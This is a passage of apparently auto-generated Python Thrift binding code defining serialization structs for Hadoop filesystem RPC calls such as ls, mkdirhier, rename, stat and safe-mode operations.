if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('isInSafeMode_args')
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class isInSafeMode_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('isInSafeMode_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class leaveSafeMode_args(object):
"""
Attributes:
- ctx
"""
thrift_spec = (
None, # 0
None, # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None,):
self.ctx = ctx
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('leaveSafeMode_args')
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class leaveSafeMode_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('leaveSafeMode_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ls_args(object):
"""
Attributes:
- ctx
- path: Path to the directory.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None,):
self.ctx = ctx
self.path = path
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ls_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ls_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Stat, Stat.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype24, _size21) = iprot.readListBegin()
for _i25 in xrange(_size21):
_elem26 = Stat()
_elem26.read(iprot)
self.success.append(_elem26)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ls_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter27 in self.success:
iter27.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class mkdirhier_args(object):
"""
Attributes:
- ctx
- path: Path to the directory.
- perms: Access permissions of the directory.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I16, 'perms', None, None, ), # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, perms=None,):
self.ctx = ctx
self.path = path
self.perms = perms
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I16:
self.perms = iprot.readI16();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('mkdirhier_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.perms is not None:
oprot.writeFieldBegin('perms', TType.I16, 2)
oprot.writeI16(self.perms)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class mkdirhier_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('mkdirhier_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class refreshNodes_args(object):
"""
Attributes:
- ctx
"""
thrift_spec = (
None, # 0
None, # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None,):
self.ctx = ctx
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('refreshNodes_args')
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class refreshNodes_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('refreshNodes_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rename_args(object):
"""
Attributes:
- ctx
- path: Path to existing file or directory.
- newPath: New path.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.STRING, 'newPath', None, None, ), # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, newPath=None,):
self.ctx = ctx
self.path = path
self.newPath = newPath
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.newPath = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rename_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.newPath is not None:
oprot.writeFieldBegin('newPath', TType.STRING, 2)
oprot.writeString(self.newPath)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rename_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rename_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class reportBadBlocks_args(object):
"""
Attributes:
- ctx
- blocks: List of corrupted blocks.
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'blocks', (TType.STRUCT,(Block, Block.thrift_spec)), None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, blocks=None,):
self.ctx = ctx
self.blocks = blocks
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.LIST:
self.blocks = []
(_etype31, _size28) = iprot.readListBegin()
for _i32 in xrange(_size28):
_elem33 = Block()
_elem33.read(iprot)
self.blocks.append(_elem33)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('reportBadBlocks_args')
if self.blocks is not None:
oprot.writeFieldBegin('blocks', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.blocks))
for iter34 in self.blocks:
iter34.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class reportBadBlocks_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('reportBadBlocks_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stat_args(object):
"""
Attributes:
- ctx
- path: Path of the file or directory.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None,):
self.ctx = ctx
self.path = path
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stat_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stat_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (Stat, Stat.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Stat()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
